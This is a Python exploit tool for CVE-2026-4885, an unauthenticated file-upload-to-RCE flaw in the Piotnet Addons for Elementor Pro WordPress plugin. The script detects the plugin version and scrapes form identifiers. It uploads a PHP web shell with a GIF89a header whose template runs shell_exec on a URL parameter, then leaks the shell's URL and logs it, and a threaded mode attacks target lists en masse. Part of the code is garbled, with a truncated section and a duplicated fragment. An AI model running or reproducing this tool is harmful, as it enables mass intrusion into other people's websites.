import httpx import asyncio import argparse import json import re import sys import os # UTF-8 output (fixes Windows CP932 / CP1252 box-drawing issues) if hasattr(sys.stdout, "reconfigure"): sys.stdout.reconfigure(encoding="utf-8", errors="replace") # Enable ANSI escape codes on Windows (no-op on Linux/Mac) os.system("") class C: RESET = "\033[0m" BOLD = "\033[1m" GREEN = "\033[92m" RED = "\033[91m" CYAN = "\033[96m" YELLOW = "\033[93m" MAGENTA = "\033[95m" GRAY = "\033[90m" PINK = "\033[95m" def clr(text, *codes): return "".join(codes) + str(text) + C.RESET VULN_VERSION = "7.1.70" RCE_MARKER = "CVE-2026-4885_PWNED" OUTPUT_FILE = "shell.txt" HEADERS = { "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36", "Accept": "*/*", "Accept-Language": "en-US,en;q=0.9", "X-Requested-With": "XMLHttpRequest", } lock = asyncio.Lock() def banner(): border = clr("╔" + "═" * 58 + "╗", C.MAGENTA) mid = clr("║" + " " * 58 + "║", C.MAGENTA) foot = clr("╚" + "═" * 58 + "╝", C.MAGENTA) def row(text, pad=58): inner = text + " " * (pad - len(text)) return clr("║", C.MAGENTA) + inner + clr("║", C.MAGENTA) cve = clr("♡ CVE-2026-4885", C.MAGENTA, C.BOLD) plug = clr("Piotnet Addons for Elementor Pro <= 7.1.70", C.CYAN) vuln = clr("Unauthenticated File Upload → RCE", C.GREEN) by = clr("by ", C.YELLOW) + clr("Shadow", C.CYAN, C.BOLD) + clr(" & ", C.YELLOW) + clr("Friska", C.MAGENTA, C.BOLD) + clr(" ♡", C.MAGENTA) # visible lengths (strip ANSI for padding calc) def vis(s): return re.sub(r'\033\[[0-9;]*m', '', s) def rowc(colored_text, pad=58): v = vis(colored_text) inner = colored_text + " " * (pad - len(v)) return clr("║", C.MAGENTA) + " " + inner + " " + clr("║", C.MAGENTA) print() print(border) print(mid) print(rowc(cve)) print(rowc(plug)) print(rowc(vuln)) print(mid) print(rowc(by)) print(mid) print(foot) print() SYMBOLS = { "+": (C.GREEN, "♡"), "-": (C.RED, "✗"), "*": (C.CYAN, "◆"), "!": (C.YELLOW, "⚠"), ">": (C.MAGENTA, "▶"), "✓": (C.GREEN, "★"), " ": (C.GRAY, " "), } def section(title): rule = clr("╾────", C.MAGENTA) + " " + clr(title, C.BOLD) + " " + clr("────╼", C.MAGENTA) print(f"\n {rule}") def log(msg, level="+"): color, sym = SYMBOLS.get(level, (C.RESET, level)) print(f" {clr(sym, color, C.BOLD)} {clr(msg, color)}") def result_box(lines, success=True): color = C.GREEN if success else C.RED def vis(s): return re.sub(r'\033\[[0-9;]*m', '', s) width = max(len(vis(l)) for l in lines) + 4 border = "═" * width print(f"\n {clr('╔' + border + '╗', color)}") for line in lines: pad = width - len(vis(line)) - 2 print(f" {clr('║', color)} {line}{' ' * pad} {clr('║', color)}") print(f" {clr('╚' + border + '╝', color)}\n") def version_lte(v1, v2): p1 = [int(x) for x in v1.split(".")] p2 = [int(x) for x in v2.split(".")] for i in range(max(len(p1), len(p2))): a = p1[i] if i < len(p1) else 0 b = p2[i] if i < len(p2) else 0 if a < b: return True if a > b: return False return True async def save_result(shell_url): async with lock: with open(OUTPUT_FILE, "a") as f: f.write(f"{shell_url}\n") def get_input(prompt, default=None, required=True): if default: val = input(f" {prompt} [{default}]: ").strip() if val.lower() == 'q': print("\n [!] Aborted") sys.exit(0) return val if val else default else: while True: val = input(f" {prompt}: ").strip() if val.lower() == 'q': print("\n [!] Aborted") sys.exit(0) if val: return val if not required: return "" print(" [!] Required (type 'q' to quit)") DEFAULT_SHELL_NAME = "shadow.phtml" def load_shell(shell_path=None): # Use specified path, or auto-detect shadow.phtml in current dir path = shell_path or DEFAULT_SHELL_NAME if not os.path.isfile(path): log(f"shell tidak ditemukan: {clr(path, C.YELLOW)}", "!") log("buat dulu file shell-nya di direktori ini, contoh isi " + clr(path, C.CYAN) + ":", "!") print(clr(r""" GIF89a ' . htmlspecialchars($name) . ''; } } if(isset($_GET['cmd'])){ echo '
' . shell_exec($_GET['cmd']) . '
'; } ?>
""", C.GRAY)) return None with open(path, "rb") as f: data = f.read() if not data.startswith(b"GIF89a"): data = b"GIF89a\n" + data ext = os.path.splitext(path)[1].lstrip(".") log(f"shell : {clr(path, C.CYAN)} ({len(data)} bytes, .{ext})", "*") return data, "shadow", ext def extract_piotnet_field_name(html): m = re.search( r'data-pafe-form-builder-field-name=["\']([^"\']+)["\']' r'[^>]*(?:type=["\']file|data-pafe-form-builder-upload)', html, re.DOTALL ) if m: return m.group(1).strip() m = re.search( r'class=["\'][^"\']*pafe-form-builder-upload[^"\']*["\']' r'[^>]*data-pafe-form-builder-field-name=["\']([^"\']+)["\']', html, re.DOTALL ) if m: return m.group(1).strip() if 'pafe-form-builder' in html or 'data-pafe-form-builder' in html: for m in re.finditer(r']*type=["\']file["\'][^>]*name=["\']([^"\']+)["\']', html): fn = m.group(1) if fn.startswith('form_fields['): continue return fn.rstrip('[]').strip() for m in re.finditer(r']*name=["\']([^"\']+)["\'][^>]*type=["\']file["\']', html): fn = m.group(1) if fn.startswith('form_fields['): continue return fn.rstrip('[]').strip() return None # ── Version Check ── async def check_version(client, target, verbose=True): if verbose: section("VERSION") try: resp = await client.get(target, follow_redirects=True, timeout=10.0) if resp.status_code == 200: m = re.search(r'piotnet-addons-for-elementor-pro/[^"\']*\?ver=([0-9.]+)', resp.text) if m: ver = m.group(1) vuln = version_lte(ver, VULN_VERSION) if verbose: if vuln: log(f"v{ver} <= {VULN_VERSION} — VULNERABLE", "+") else: log(f"v{ver} > {VULN_VERSION} — not vulnerable", "-") return ver, vuln if 'piotnet-addons-for-elementor' in resp.text: if verbose: log("plugin detected — version unknown", "?") return None, None except: pass asset_paths = [ "/wp-content/plugins/piotnet-addons-for-elementor-pro/assets/css/minify/extension.min.css", "/wp-content/plugins/piotnet-addons-for-elementor-pro/assets/js/minify/extension.min.js", ] for path in asset_paths: try: resp = await client.get(f"{target}{path}", follow_redirects=True, timeout=5.0) if resp.status_code == 200: if verbose: log("plugin exists (asset found) — version unknown", "?") return None, None except: continue if verbose: log("Piotnet Addons Pro not detected", "-") return None, False # ── Auto Recon ── async def auto_recon(client, target, verbose=True): if verbose: section("RECON") pages = [ target, f"{target}/contact", f"{target}/contact-us", f"{target}/apply", f"{target}/register", f"{target}/submit", f"{target}/upload", f"{target}/form", f"{target}/quote", f"{target}/careers", ] try: home = await client.get(target, follow_redirects=True) if home.status_code == 200: links = re.findall(rf'href=["\']({re.escape(target)}[^"\'#]*)["\']', home.text) links += re.findall(rf'href=["\'](/[^"\'#]*)["\']', home.text) for link in links: full = link if link.startswith("http") else f"{target}{link}" if full not in pages and not re.search(r'\.(css|js|png|jpg|svg|woff|gif)(\?|$)', full): pages.append(full) except: pass if verbose: log(f"scanning {len(pages)} pages (parallel)...", "*") sem = asyncio.Semaphore(10) async def fetch(url): async with sem: try: r = await client.get(url, follow_redirects=True, timeout=5.0) if r.status_code == 200: return (url, r.text) except: pass return (url, None) results = await asyncio.gather(*[fetch(u) for u in pages]) best = good = decent = fallback = None scanned = 0 for page_url, html in results: if html is None: continue scanned += 1 if 'pafe' not in html.lower() and 'piotnet' not in html.lower(): continue is_piotnet = ( 'pafe-form-builder' in html or 'data-pafe-form-builder' in html or 'pafe_ajax_form_builder' in html ) data = {'_piotnet': is_piotnet} # post_id pid = ( re.search(r'data-elementor-id=["\'](\d+)["\']', html) or re.search(r']*name=["\']post_id["\'][^>]*value=["\'](\d+)["\']', html) or re.search(r'data-pafe-form-builder-submit-post-id=["\'](\d+)["\']', html) or re.search(r'"post_id":\s*"?(\d+)"?', html) ) if pid: data['post_id'] = pid.group(1).strip() else: pp = re.search(r'page-id-(\d+)', html) if pp: data['_page_id'] = pp.group(1).strip() # form_id (Elementor widget element ID) fid = ( re.search(r']*name=["\']form_id["\'][^>]*value=["\']([^"\']+)["\']', html) or re.search(r']*value=["\']([^"\']+)["\'][^>]*name=["\']form_id["\']', html) or re.search(r'"form_id":\s*"([^"]+)"', html) ) if fid: data['form_id'] = fid.group(1).strip() # field_name fname = extract_piotnet_field_name(html) if fname: data['field_name'] = fname has_fid = 'form_id' in data has_fn = 'field_name' in data has_pid = 'post_id' in data if not has_fid and not has_fn: continue data['page'] = page_url if not has_pid and '_page_id' in data: data['post_id'] = data['_page_id'] has_pid = True if verbose: show = {k: v for k, v in data.items() if not k.startswith('_') and k != 'page'} tag = "PIOTNET" if is_piotnet else "OTHER" kv = " | ".join(f"{k}={v}" for k, v in show.items()) log(f"[{tag}] {page_url}", "+") log(f" {kv}", " ") if has_fn and has_fid and has_pid: if not best: best = data elif has_fn and has_fid and not good: good = data elif has_fid and has_pid and not decent: decent = data elif has_fid and not fallback: fallback = data if verbose: log(f"scanned {scanned}/{len(pages)} reachable pages", "*") result = best or good or decent or fallback if result and verbose: log(f"using : {result.get('page', '?')}", "*") elif verbose: log("no Piotnet forms found", "!") return result or {} # ── Upload ── async def upload_shell(client, ajax_url, post_id, form_id, field_name, ext, shell_data, shell_name): fields_json = json.dumps([{ "name": field_name, "value": "", "file_name": [f"{shell_name}.{ext}"], "attach-files": 0, "type": "file", "image_upload": False }]) resp = await client.post(ajax_url, data={ "action": "pafe_ajax_form_builder", "post_id": post_id, "form_id": form_id, "fields": fields_json }, files={ f"{field_name}[]": (f"{shell_name}.{ext}", shell_data, "application/octet-stream") }, follow_redirects=False) return resp # ── Leak URL ── async def leak_url(client, ajax_url, ext, shell_name): resp = await client.get(ajax_url, params={"action": "pafe_export_database"}) content = resp.text.replace('\ufeff', '') name_escaped = re.escape(shell_name) match = re.search( rf'https?://[^\s",\r\n]+/{name_escaped}-[a-f0-9]+\.{re.escape(ext)}', content ) return match.group(0) if match else None # ── Exploit Single Target ── async def exploit_single(target, shell_data, shell_name, shell_ext=None, verbose=True): target = target.rstrip("/") ajax_url = f"{target}/wp-admin/admin-ajax.php" hdrs = {**HEADERS, "Referer": f"{target}/", "Origin": target} async with httpx.AsyncClient(timeout=15.0, follow_redirects=True, headers=hdrs, verify=False) as client: # Version check ver, vuln = await check_version(client, target, verbose) if vuln is False and ver: if verbose: log(f"not vulnerable (v{ver}) — aborting", "!") return None # Recon recon = await auto_recon(client, target, verbose) post_id = recon.get('post_id', '1') form_id = recon.get('form_id', 'default') field_name = recon.get('field_name', 'file') if verbose: section("EXPLOIT") log(f"post_id={post_id} | form_id={form_id} | field={field_name}", "*") if not shell_ext: if verbose: log("shell extension tidak diketahui", "!") return None exts = [shell_ext] for ext in exts: if verbose: log(f"trying .{ext} ...", ">") try: resp = await upload_shell(client, ajax_url, post_id, form_id, field_name, ext, shell_data, shell_name) except Exception as e: if verbose: log(f"connection error: {e}", "-") break body = resp.text.strip() # Response checks if resp.status_code in (301, 302, 303, 307, 308): if verbose: log(f"redirected ({resp.status_code}) → {resp.headers.get('location','?')}", "-") break if body == "0": if verbose: log("handler not registered (WP returned '0')", "-") break if len(body) > 1000 and body.lstrip().startswith('") try: resp = await upload_shell(client, ajax_url, post_id, form_id, field_name, ext, shell_data, shell_name) except Exception as e: log(f"connection error: {e}", "-") break body = resp.text.strip() if resp.status_code in (301, 302, 303, 307, 308): log(f"redirected ({resp.status_code}) → {resp.headers.get('location','?')}", "-") break if body == "0": log("handler not registered (WP returned '0')", "-") break if len(body) > 1000 and body.lstrip().startswith(' 0) # ── Interactive Menu Helpers ── BLOCKED_EXT = ["php", "phpt", "php5", "php7", "exe"] def ask_shell(): """Interactively ask for shell filename, check existence, return (data, name, ext) or None.""" blocked = " ".join(clr(f".{e}", C.RED) for e in BLOCKED_EXT) print(f" {clr('⚠', C.YELLOW, C.BOLD)} {clr('blocked ext :', C.YELLOW)} {blocked}") raw = input(f" {clr('◆', C.CYAN, C.BOLD)} {clr('shell name', C.CYAN)} [{clr(DEFAULT_SHELL_NAME, C.YELLOW)}] {clr('', C.GRAY)} : ").strip() path = raw if raw else DEFAULT_SHELL_NAME return load_shell(path) async def menu_single(): section("ONE TARGET") target = input(f" {clr('◆', C.CYAN, C.BOLD)} {clr('target url', C.CYAN)} : ").strip().rstrip("/") if not target: log("target tidak boleh kosong", "!") return result = ask_shell() if result is None: return shell_data, shell_name, shell_ext = result url = await exploit_single(target, shell_data, shell_name, shell_ext, verbose=True) if url: log(f"saved → {OUTPUT_FILE}", "*") async def menu_mass(): section("MASS") fname = input(f" {clr('◆', C.CYAN, C.BOLD)} {clr('targets file', C.CYAN)} [{clr('targets.txt', C.YELLOW)}] : ").strip() if not fname: fname = "targets.txt" if not os.path.isfile(fname): log(f"file tidak ditemukan: {clr(fname, C.YELLOW)}", "!") return with open(fname) as f: targets = [l.strip().rstrip("/") for l in f if l.strip() and not l.startswith("#")] if not targets: log(f"tidak ada target di {fname}", "!") return log(f"loaded {clr(str(len(targets)), C.GREEN)} targets dari {clr(fname, C.CYAN)}", "*") raw_t = input(f" {clr('◆', C.CYAN, C.BOLD)} {clr('threads', C.CYAN)} [{clr('5', C.YELLOW)}] : ").strip() threads = int(raw_t) if raw_t.isdigit() else 5 result = ask_shell() if result is None: return shell_data, shell_name, shell_ext = result await mass_mode(targets, shell_data, shell_name, shell_ext, threads) async def interactive_menu(): while True: section("MENU") print(f"\n {clr('1', C.MAGENTA, C.BOLD)} {clr('▶', C.MAGENTA)} {clr('one target', C.CYAN)}") print(f" {clr('2', C.MAGENTA, C.BOLD)} {clr('▶', C.MAGENTA)} {clr('mass scan', C.CYAN)}") print(f" {clr('3', C.MAGENTA, C.BOLD)} {clr('▶', C.MAGENTA)} {clr('exit', C.YELLOW)}") print() choice = input(f" {clr('[1/2/3]', C.CYAN)} : ").strip() if choice == "1": await menu_single() elif choice == "2": await menu_mass() elif choice in ("3", "q", "exit"): log("bye~ ♡", "*") print() return else: log("pilih 1, 2, atau 3", "!") # ── Main ── async def main(): banner() parser = argparse.ArgumentParser(add_help=False) parser.add_argument("-u", "--url", help="Single target URL") parser.add_argument("-f", "--file", help="File with target URLs") parser.add_argument("-s", "--shell", help="Custom shell file") parser.add_argument("-t", "--threads", type=int, default=5) parser.add_argument("-h", "--help", action="store_true") args = parser.parse_args() if args.help: print(clr(" Usage:", C.BOLD)) print(f" {clr('python3 shadow.py', C.CYAN)} {clr('Interactive menu', C.GRAY)}") print(f" {clr('python3 shadow.py -u https://target.com', C.CYAN)} {clr('Single target', C.GRAY)}") print(f" {clr('python3 shadow.py -f targets.txt -t 10', C.CYAN)} {clr('Mass mode (10 threads)', C.GRAY)}") print(f" {clr('python3 shadow.py -u https://target.com -s shell.php', C.CYAN)} {clr('Custom shell', C.GRAY)}") print() print(clr(" Options:", C.BOLD)) print(f" {clr('-u, --url ', C.MAGENTA)} Target URL") print(f" {clr('-f, --file ', C.MAGENTA)} File with target URLs (one per line)") print(f" {clr('-s, --shell ', C.MAGENTA)} Custom PHP shell file (GIF89a auto-prepended)") print(f" {clr('-t, --threads', C.MAGENTA)} Concurrent threads for mass mode (default: 5)") print(f" {clr('-h, --help ', C.MAGENTA)} Show this help") print() return # ── CLI mode (non-interactive) ── if args.url or args.file: result = load_shell(args.shell) if result is None: return shell_data, shell_name, shell_ext = result if args.file: if not os.path.isfile(args.file): log(f"file tidak ditemukan: {args.file}", "!") return with open(args.file) as f: targets = [l.strip().rstrip("/") for l in f if l.strip() and not l.startswith("#")] if not targets: log(f"tidak ada target di {args.file}", "!") return await mass_mode(targets, shell_data, shell_name, shell_ext, args.threads) else: target = args.url.rstrip("/") url = await exploit_single(target, shell_data, shell_name, shell_ext, verbose=True) if url: log(f"saved → {OUTPUT_FILE}", "*") return # ── Interactive menu (default) ── await interactive_menu() if __name__ == "__main__": asyncio.run(main())